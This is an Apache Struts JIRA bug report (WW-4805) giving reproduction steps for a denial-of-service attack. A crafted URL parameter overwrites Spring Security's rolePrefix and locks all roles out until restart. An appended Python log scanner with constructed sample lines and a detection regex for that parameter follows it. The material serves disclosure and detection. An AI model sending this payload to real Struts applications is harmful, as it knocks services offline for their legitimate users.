[ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16058896#comment-16058896 ]
ASF GitHub Bot commented on WW-4805:
------------------------------------

Github user lukaszlenart commented on the issue:

    https://github.com/apache/struts/pull/145

    I'm not able to merge this PR as it also contains some changes from the `master` branch - I have no idea how that happened, maybe some GitHub PR magic :\ I will try to cherry-pick this.


> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
>                 Key: WW-4805
>                 URL: https://issues.apache.org/jira/browse/WW-4805
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core, Plugin - Spring
>    Affects Versions: 2.3.32, 2.5.10
>            Reporter: Yasser Zamani
>              Labels: github-import, patch, security
>             Fix For: 2.3.33, 2.5.next
>
>
> This is a DoS attack example for when a Struts2 user uses Spring to secure his actions, as mentioned in the section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
>
> Attack Steps:
> # An anonymous user logs in as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
> where {action0-actionN} are actions available for users
>
> Attack Impacts:
> By replacing `rolePrefix`, the attacker blocks access to secured actions for all defined roles even if they authenticate via login! So services are down and a webapp restart is required to get back to normal!!!
>
> Configuration Example:
> * spring-security.xml
> {code:xml}
> <global-method-security secured-annotations="enabled" proxy-target-class="true" />
> <http auto-config="true" use-expressions="false">
>     <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
> </http>
> <authentication-manager erase-credentials="false">
>     <authentication-provider>
>         <user-service>
>             <user name="admin" password="admin" authorities="ROLE_ADMIN" />
>             <user name="user" password="user" authorities="ROLE_USER" />
>         </user-service>
>     </authentication-provider>
> </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
> <action name="admin" class="secureAction" method="admin">
>     <result name="success" type="json" />
> </action>
> <action name="user" class="secureAction" method="user">
>     <result name="success" type="json" />
> </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
>
> import org.springframework.security.access.annotation.Secured;
>
> public class SecureAction {
>
>     @Secured({"ROLE_ADMIN"})
>     public String admin() {
>         return "success";
>     }
>
>     @Secured({"ROLE_USER"})
>     public String user() {
>         return "success";
>     }
> }
> {code}
> * login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as user.
> * open
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via
> {noformat}
> http://{ip}:{port}/login
> {noformat}
> as admin.
> * try to access
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
> which fails!
> * also repeat 5 and try to open
> {noformat}
> http://{ip}:{port}/user
> {noformat}
> which also fails!
> * Services are down and a webapp restart is required to get back to normal.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)
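As an added detection example (not code from the Struts project or from the reporter), the following Python scans access-log lines for request parameter names that navigate into a Spring AOP proxy's advisor chain and on into Spring Security's access-decision objects, which is the path the report above uses to overwrite `rolePrefix`. The log lines are constructed here, and the combined log format is an assumption; percent-encoded brackets are decoded before matching so `advisors%5B0%5D` is caught the same as `advisors[0]`.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names that reach proxy internals: "advisors" is the Advised
# proxy's advisor list, the rest follows the path shown in WW-4805.
PROXY_INTERNALS = re.compile(
    r"^advisors\b|\.advice\b|accessDecisionManager|decisionVoters|\brolePrefix$"
)

# Constructed sample log lines in combined format (assumption; not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - user [22/Jun/2017:10:01:02 +0000] "GET /user HTTP/1.1" 200 57
10.0.0.5 - user [22/Jun/2017:10:01:09 +0000] "GET /user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit HTTP/1.1" 200 57
10.0.0.9 - user [22/Jun/2017:10:02:14 +0000] "GET /user?advisors%5B1%5D.advice.accessDecisionManager.decisionVoters%5B0%5D.rolePrefix=x HTTP/1.1" 200 57
10.0.0.7 - admin [22/Jun/2017:10:03:00 +0000] "GET /admin?page=2&sort=name HTTP/1.1" 200 120
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return parameter names in a request target that reach proxy/security internals."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes names, so encoded and literal brackets match alike.
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if PROXY_INTERNALS.search(name)]


def scan_log(text):
    """Return (client, action path, parameter name) for every flagged parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split()[0]
        target = m.group("target")
        for name in suspicious_params(target):
            hits.append((client, urlsplit(target).path, name))
    return hits


if __name__ == "__main__":
    for client, action, name in scan_log(SAMPLE_LOG):
        print(f"{client} -> {action}: parameter '{name}' targets proxy internals")
```

A single hit is enough to warrant a restart of the webapp, since the report notes the overwritten `rolePrefix` persists until then.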